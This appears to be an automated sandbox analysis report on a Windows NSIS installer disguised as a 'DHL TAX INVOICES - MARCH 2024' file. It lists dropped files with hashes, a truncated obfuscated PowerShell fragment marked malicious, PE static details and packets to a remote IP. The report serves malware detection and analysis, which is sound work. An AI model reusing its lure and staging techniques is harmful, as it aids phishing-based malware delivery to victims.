                                                          • Filename: IMG-2023010_WAA646737kendelsesordningenBalneo.exe, Detection: malicious, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,..................Rich...........PE..L....z.W...........!......................... ...............................P.......................................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..L.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\nsm3EBD.tmp

                                                          Download File
                                                          Process:C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2335299
                                                          Entropy (8bit):2.228536436984118
                                                          Encrypted:false
                                                          SSDEEP:12288:+YEsuweLDCe3BY0UGgh2ji7MaAzHcNkBLt:+YE4exYgpi7M3dLt
                                                          MD5:56CCB4A45C20BBA625A508FCD0F948EB
                                                          SHA1:A51248C69355B1C40B96EC66A6B4359FEFC3FD23
                                                          SHA-256:9E2477183DE438BCBF2CC3AF97CCB31D6E48BC2FCBAF882077865A20E31FFA66
                                                          SHA-512:F6CEE1F5C223A5FE75602F84B1584D77AF863E0F9DC7C8BE785B043D1274D3452DB9359EE3A3B56F15593ADDFB43D4136F60F69DDE966227C95E502C8BD47A8C
                                                          Malicious:false
                                                          Preview:.'......,...................^...........L&.......'..............................................v.u.........Y.o.............................................................................................................................................................................G...J...............j...............................................................................................................................Q...............7.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\releve\Borgerrettigheders\Kompletterings\Hackling\Swordman\Sydside.Ski

                                                          Download File
                                                          Process:C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):362225
                                                          Entropy (8bit):7.583959296966973
                                                          Encrypted:false
                                                          SSDEEP:6144:QiYECBdMEjlgweL1zv/JCXutRa4b8xm1TeTjy0Vjh26Gi7MhQFmLzHDMfLxq:7YEsuweLDCe3BY0UGgh2ji7MaAzHcNq
                                                          MD5:213296C17D11ADF994B3D8EEA2F44497
                                                          SHA1:48CB90D8D8063EF5CA129084CED6F9279CDF31B0
                                                          SHA-256:7603126A3E7F1258479357E5DF46BCDF769004B536F678F4BFF0BD72FE1AB816
                                                          SHA-512:77C4A3CC051ED8EEAAEA917E077170E413C1BD80ED119ACDD40B699025BD72C26907CE108F4CBE1396F38737FAB73FA92AC55153DDE4323661C78DDA62151BD4
                                                          Malicious:false
                                                          Preview:...A........Q......e..............,,,......lll.................EEE.7.||||.9..........```.....X.."".].....<.................6........vv.q...................j.............$$....%%......... ..................................jj.n...................&........j....................AAA....A...............DD........-..................LLLL....................................//................................................$........A...J..G.zzz.,...............P.....`.......yy..$.............==.........H...-.....[........cc............a.......................,.....H...................BB.........LL.......V............................>........Q...-.?..........I.........c.....t....'''...............8.........<<<<<<.]......c..4...........L..IIIII....p..""........................}.A.}.oo............................nn.6........k...........qqq..............{{.........:.%...............................RRR.....................i...22..1.......ii............................U.........................0.<<..

                                                          C:\Users\user\AppData\Local\releve\DHL TAX INVOICES - MARCH 2024.exe

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                          Category:dropped
                                                          Size (bytes):870646
                                                          Entropy (8bit):6.6567275260390995
                                                          Encrypted:false
                                                          SSDEEP:12288:agyMCmL5EW2zV3mDinwWxjQKQpUGk06VqbwQX3isAr:YViiwwEKQpUs6swI32
                                                          MD5:9751F18FB374BF112F867381A68BB3A9
                                                          SHA1:B6690412B3CE7E65D76437B4D6704A3646E62938
                                                          SHA-256:D53AFBFC333ACB95639354FE5EB9CDDCE8FC0F59190D23DBFA60FEC9944A5E27
                                                          SHA-512:B42A8071E8234C62FBD8028E9F364A39B0DAEB7A62B7CCBC94F3588CDDA7BE93953834C737AB01B3FEEBCC51665A0A528EDE9F2042AF369AD3A1ECEE69BD8B6F
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                          • Antivirus: Virustotal, Detection: 13%, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1..P...P...P..*_...P...P..OP..*_...P..s...P...V...P..Rich.P..........PE..L....z.W.................b...*.......3............@..........................`............@..........................................................................................................................................................text...]a.......b.................. ..`.rdata...............f..............@..@.data...8............z..............@....ndata...................................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\releve\DHL TAX INVOICES - MARCH 2024.exe:Zone.Identifier

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):26
                                                          Entropy (8bit):3.95006375643621
                                                          Encrypted:false
                                                          SSDEEP:3:ggPYV:rPYV
                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                          Malicious:false
                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                          C:\Users\user\AppData\Local\releve\Fljlens.bro

                                                          Download File
                                                          Process:C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):710597
                                                          Entropy (8bit):0.4275192651871367
                                                          Encrypted:false
                                                          SSDEEP:768:WKRtrtXot873KIx+BWGvZsb7SKsoisH3kQJ3FbQPKbffiJy/pk5XC2F1TmdxCN1h:Wov60Q2ip
                                                          MD5:45DE86E7EC59C5E4E5FB2ED53061188D
                                                          SHA1:E2FD2269F4645EECE08831DD5CACC4635D500E06
                                                          SHA-256:A18183D891AE2282D9051D4D462DDA1B346085AE0E7AF525F5C31B4F20B803D2
                                                          SHA-512:2F8A2402C46B277A6B8741093B845DC3E3E6B3526910D6C10E3A86D1A0EEE8A157CA0156989A1A99B7006CF7BA24D11FFAD43FE9CC0B8B257C5513F6BF390BB8
                                                          Malicious:false
                                                          Preview:...........................................................................................................................................................N...........................................................................................................................................................................................#...........................................................................................s.P.......................................................................................................................................................................................................................................................................................,...........................................................................................................................................................................~..............................................................................................................

                                                          C:\Users\user\AppData\Local\releve\Handelshindringens.Dec

                                                          Download File
                                                          Process:C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe
                                                          File Type:ASCII text, with very long lines (51121), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):51121
                                                          Entropy (8bit):5.447671723801437
                                                          Encrypted:false
                                                          SSDEEP:1536:8cdYRGdh2mJBi9i2cMJC/uvyxOd8maeZ1q6KwDN2C:Bbh7J+5CHxOdbn1qr2Nh
                                                          MD5:26AC3D358904DE47313A08E6E95B9EF8
                                                          SHA1:D8CB62FA3F065244D37862489962401A3C829A9A
                                                          SHA-256:A87DC179EA36DF155F5D8B7A8A5963EF1DE61FA7032DB510A8A1F64033182FF2
                                                          SHA-512:EFC8932A6E6CB055FD76603CADE1CE298C2D19F250D9E3234255F55B2EC28B6C34345F35A017816B35400A4258EB0CCA8FDF885A1C8B5F0C08F50731D17BAE71
                                                          Malicious:true
                                                          Preview:$Dollars=$materialism;<#Indicates Phonic Priskas Flaith Underfor Vectorizing #><#Kolera Helhedsbetragtninger korkblte Betjentstuens #><#Dorsulum Handmaids Nulkomponents ideassociationerne #><#unasthmatic Sencio Dollarerne Intricateness #><#Nummerplade Papirnusser Generalljtnanternes Sikkerhedsmaessige Angiospastic mortificationers #><#Beliggenheds Tretaaedes Betrak Brassier Paniculated #><#Forebearing Prventionernes Hotelvrelsers Mossberry Anthropomorphise amboina Dynamitish #><#Ephesus Kuldkastningen Settled Udvejede Salim Formentliges #><#Orangy Kongrespaladsets Brutalized Tapetserbordenes Extraversions Skr #><#Slurkenes Sowed Zonite lftebevgelserne Iconotype #><#Gedske Edwina vinstue #><#Depechers forskruede officinernes Trappabilities #><#Afgrnsedes Natuglerne Scallom Kurdisk #><#Investeringsforening Besteget Oleum Ripstop Symmory Dorer #><#Skrners Eftertragte Teposerne Duomos Oidiomycosis Dissepimental #><#Dominoet Subtilitets Gennemrejs Diakinesis Opvurder Kofoed Atlantean #><#tr

                                                          C:\Users\user\AppData\Local\releve\erhvervshmmets.ten

                                                          Download File
                                                          Process:C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):677204
                                                          Entropy (8bit):0.4271945994938534
                                                          Encrypted:false
                                                          SSDEEP:768:Cg6nSaeWp7roSf5WH9ybdJP/tn7PA43zK+1BoED5f74ZkD/MK1Z7M2E039ZCS2tD:85Fqk
                                                          MD5:359EC97A933B88A53AF37470C2A65967
                                                          SHA1:047DAAFFAA0024F646A7D3E0B2E475413C43C7E6
                                                          SHA-256:B20E10FF5D29A94D05C4C0D0120A7A3489182EC8E76D98BAF34A946E9F1A0583
                                                          SHA-512:76A4F29170B6249F47245D0DCE1B4595DB98D564583FBD286C693CEBB31206A7460F4A3C4BEF3338E6BA2DA7062536F43DA141B744503228B8E8D90B7DA43532
                                                          Malicious:false
                                                          Preview:.....+.......................................................................................................................................................................7......................................6......................................(...........................................................&.......................7.......B........................................(.........................................................................................................................................................................................................................................g.....................................................................................=..................................................................................................................k....................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\releve\saarbarestes.txt

                                                          Download File
                                                          Process:C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe
                                                          File Type:ASCII text, with very long lines (317), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):545
                                                          Entropy (8bit):4.27451532888585
                                                          Encrypted:false
                                                          SSDEEP:12:v6ukGX3KlkBTXETX5eWxrBtZ7mr8f/O9WFv+e8ZDXG+F3/guZo9rLn:5dKlkBTQJXBz7L6W78RXRx/guZo9rLn
                                                          MD5:4B698DA0F4172BEAFB7948D5A9BB6E32
                                                          SHA1:1F340DA3FFA3D44921DB00B64E1131C3E9C7E55C
                                                          SHA-256:535E3C82563232C3CAB08FD3AC94B7FF3F5C40EDF4FC345222B2516D3C3E9C6C
                                                          SHA-512:5C109BFDA596E6ECF211C077E9A75A70C5559DF9C30CC4A01F0828326227103F1F960F201E1615102765270C4937F79942381E8B0889D71C885253803EDAED07
                                                          Malicious:false
                                                          Preview:smidighederne kikke damefrisrinder rosanna hundeslaede nynnende confated..palapteryx flexured beckoning tven diamantbryllupperne verdenskrig anseeligst,tilbagetraeden phasiron husbandlike quarenden,minimales vindene rboernes ssort galactolysis velbeholden.unreave afslutningsdebatter elokvensen youdendrift metodisme battende photoisomeric rhombogene rgvarernes bookmakers trawley priklepind..psittacosis ovillus multivoltine honningers aflight giggled printteksters brndstrup interknotting hyoglossal almenmenneskelig ventricous drillevornere..

                                                          C:\Users\user\AppData\Local\releve\startsymbolers.pro

                                                          Download File
                                                          Process:C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):516910
                                                          Entropy (8bit):0.4280710301837487
                                                          Encrypted:false
                                                          SSDEEP:768:O8HlxWnNCSVvAb60ku7WszE7e3P6z80nOEPFGQCr//vhS3KN5MFzk:XWoF
                                                          MD5:BF4C39957B38842B30C3AD3B3E6C7B12
                                                          SHA1:DA2223F3437AC09EDE73BC0F04D4CCD20E53CCA2
                                                          SHA-256:6AAAC21670C9D5FAFC0487B0F83F2E7104EF5D1F8989707D0227175389E4EBA8
                                                          SHA-512:003AF17DE7AF3C3D1FABF67D3684D7B3B219125E5B0CFAFD6C3F5898797D646F58700C6DCE09D07B1F6C9CF2BDA0E4BEA027A0F610559BAB81A7E4A4D9C8FBF5
                                                          Malicious:false
                                                          Preview:..........................................................................................................................C.......................Y..............(...................................................G.............8..........................................................).............................................................................................................................................................................................s...................Y.................................................................................................3..................................D..................................................2............................................................................................................................................................................................................................................................................................................................D..

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                          Entropy (8bit):6.6567275260390995
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:DHL TAX INVOICES - MARCH 2024.exe
                                                          File size:870'646 bytes
                                                          MD5:9751f18fb374bf112f867381a68bb3a9
                                                          SHA1:b6690412b3ce7e65d76437b4d6704a3646e62938
                                                          SHA256:d53afbfc333acb95639354fe5eb9cddce8fc0f59190d23dbfa60fec9944a5e27
                                                          SHA512:b42a8071e8234c62fbd8028e9f364a39b0daeb7a62b7ccbc94f3588cdda7be93953834c737ab01b3feebcc51665a0a528ede9f2042af369ad3a1ecee69bd8b6f
                                                          SSDEEP:12288:agyMCmL5EW2zV3mDinwWxjQKQpUGk06VqbwQX3isAr:YViiwwEKQpUs6swI32
                                                          TLSH:2B05AE87AA8BA5C5C1D7067395D286C04B5FBFB443A90FC1D749B222DD3158EBE03E1A
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..OP..*_...P...s...P...V...P..Rich.P..........PE..L....z.W.................b...*.......3............@

                                                          File Icon

                                                          Icon Hash:1e76e3211819190f

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x4033b6
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x57017AB0 [Sun Apr 3 20:18:56 2016 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:4ea4df5d94204fc550be1874e1b77ea7

                                                          Entrypoint Preview

                                                          Instruction
                                                          sub esp, 000002D4h
                                                          push ebx
                                                          push esi
                                                          push edi
                                                          push 00000020h
                                                          pop edi
                                                          xor ebx, ebx
                                                          push 00008001h
                                                          mov dword ptr [esp+14h], ebx
                                                          mov dword ptr [esp+10h], 0040A230h
                                                          mov dword ptr [esp+1Ch], ebx
                                                          call dword ptr [004080B4h]
                                                          call dword ptr [004080B0h]
                                                          cmp ax, 00000006h
                                                          je 00007F4554D928F3h
                                                          push ebx
                                                          call 00007F4554D95A4Ch
                                                          cmp eax, ebx
                                                          je 00007F4554D928E9h
                                                          push 00000C00h
                                                          call eax
                                                          mov esi, 004082B8h
                                                          push esi
                                                          call 00007F4554D959C6h
                                                          push esi
                                                          call dword ptr [0040815Ch]
                                                          lea esi, dword ptr [esi+eax+01h]
                                                          cmp byte ptr [esi], 00000000h
                                                          jne 00007F4554D928CCh
                                                          push ebp
                                                          push 00000009h
                                                          call 00007F4554D95A1Eh
                                                          push 00000007h
                                                          call 00007F4554D95A17h
                                                          mov dword ptr [0042A244h], eax
                                                          call dword ptr [0040803Ch]
                                                          push ebx
                                                          call dword ptr [004082A4h]
                                                          mov dword ptr [0042A2F8h], eax
                                                          push ebx
                                                          lea eax, dword ptr [esp+34h]
                                                          push 000002B4h
                                                          push eax
                                                          push ebx
                                                          push 004216E8h
                                                          call dword ptr [00408188h]
                                                          push 0040A384h
                                                          push 00429240h
                                                          call 00007F4554D95600h
                                                          call dword ptr [004080ACh]
                                                          mov ebp, 00435000h
                                                          push eax
                                                          push ebp
                                                          call 00007F4554D955EEh
                                                          push ebx
                                                          call dword ptr [00408174h]
                                                          add word ptr [eax], 0000h

                                                          Rich Headers

                                                          Programming Language:
                                                          • [EXP] VC++ 6.0 SP5 build 8804

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x480000x5d5b0.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b4.rdata
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x10000x615d0x6200c5c0065fc4c103ac2469dafdce131fb4False0.6616709183673469data6.45041359169741IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rdata0x80000x13a40x14004ac891d4ddf58633f14436f9f80ac6b6False0.4529296875data5.163001655755973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .data0xa0000x203380x60066b45fceba0f24d768fb09e0afe23c99False0.5026041666666666data3.9824009583068882IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .ndata0x2b0000x1d0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rsrc0x480000x5d5b00x5d6008a67a6dd81a0dde63aad310efed593c4False0.19508502761044177data3.9086848256359468IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          RT_ICON0x483700x42028Device independent bitmap graphic, 256 x 512 x 32, image size 270336EnglishUnited States0.14949551735361127
                                                          RT_ICON0x8a3980x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.23527150124216253
                                                          RT_ICON0x9abc00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.3454180444024563
                                                          RT_ICON0x9ede80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.3813278008298755
                                                          RT_ICON0xa13900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.46153846153846156
                                                          RT_ICON0xa24380xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.5978144989339019
                                                          RT_ICON0xa32e00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.4786885245901639
                                                          RT_ICON0xa3c680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.73014440433213
                                                          RT_ICON0xa45100x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.4725433526011561
                                                          RT_ICON0xa4a780x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6799645390070922
                                                          RT_DIALOG0xa4ee00x100dataEnglishUnited States0.5234375
                                                          RT_DIALOG0xa4fe00xf8dataEnglishUnited States0.6370967741935484
                                                          RT_DIALOG0xa50d80xa0dataEnglishUnited States0.6125
                                                          RT_DIALOG0xa51780x60dataEnglishUnited States0.7291666666666666
                                                          RT_GROUP_ICON0xa51d80x92dataEnglishUnited States0.6506849315068494
                                                          RT_MANIFEST0xa52700x340XML 1.0 document, ASCII text, with very long lines (832), with no line terminatorsEnglishUnited States0.5540865384615384

                                                          Imports

                                                          DLLImport
                                                          KERNEL32.dllSetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, CreateFileW, GetFileSize, MoveFileW, SetFileAttributesW, GetModuleFileNameW, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, WaitForSingleObject, GetCurrentProcess, CompareFileTime, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GetDiskFreeSpaceW, lstrlenW, lstrcpynW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                          USER32.dllGetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, LoadImageW, SetTimer, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, DrawTextW, EndPaint, CreateDialogParamW, SendMessageTimeoutW, SetForegroundWindow
                                                          GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                          SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                          ADVAPI32.dllRegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                          COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                          ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                          Possible Origin

                                                          Language of compilation systemCountry where language is spokenMap
                                                          EnglishUnited States

                                                          Network Behavior

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Mar 28, 2024 08:01:59.281778097 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:01:59.480781078 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:01:59.480860949 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:01:59.486421108 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:01:59.688487053 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:01:59.688504934 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:01:59.688546896 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:01:59.688563108 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:01:59.688575983 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:01:59.688637018 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:01:59.688656092 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:01:59.688669920 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:01:59.688697100 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:01:59.688707113 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:01:59.688716888 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:01:59.688736916 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:01:59.688743114 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:01:59.688746929 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:01:59.688760042 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:01:59.688786983 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:01:59.688813925 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:01:59.888006926 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:01:59.888075113 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:01:59.888081074 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:01:59.888099909 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:01:59.888130903 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:01:59.888145924 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:01:59.888227940 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:01:59.888242006 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:01:59.888253927 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:01:59.888271093 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:01:59.888284922 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:01:59.888326883 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:01:59.888351917 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:01:59.888372898 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:01:59.888389111 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:01:59.888494968 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:01:59.888535023 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:01:59.888542891 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:01:59.888580084 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:01:59.888598919 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:01:59.888639927 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:01:59.888643980 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:01:59.888680935 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:01:59.888736010 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:01:59.888792992 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:01:59.888803005 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:01:59.888819933 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:01:59.888834953 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:01:59.888856888 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:01:59.888883114 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:01:59.888925076 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:01:59.888931990 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:01:59.888966084 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:01:59.889208078 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:01:59.889246941 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:01:59.889257908 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:01:59.889292002 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:01:59.889303923 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:01:59.889339924 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.087126970 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.087178946 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.087192059 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.087219954 CET804973683.137.157.76192.168.2.4
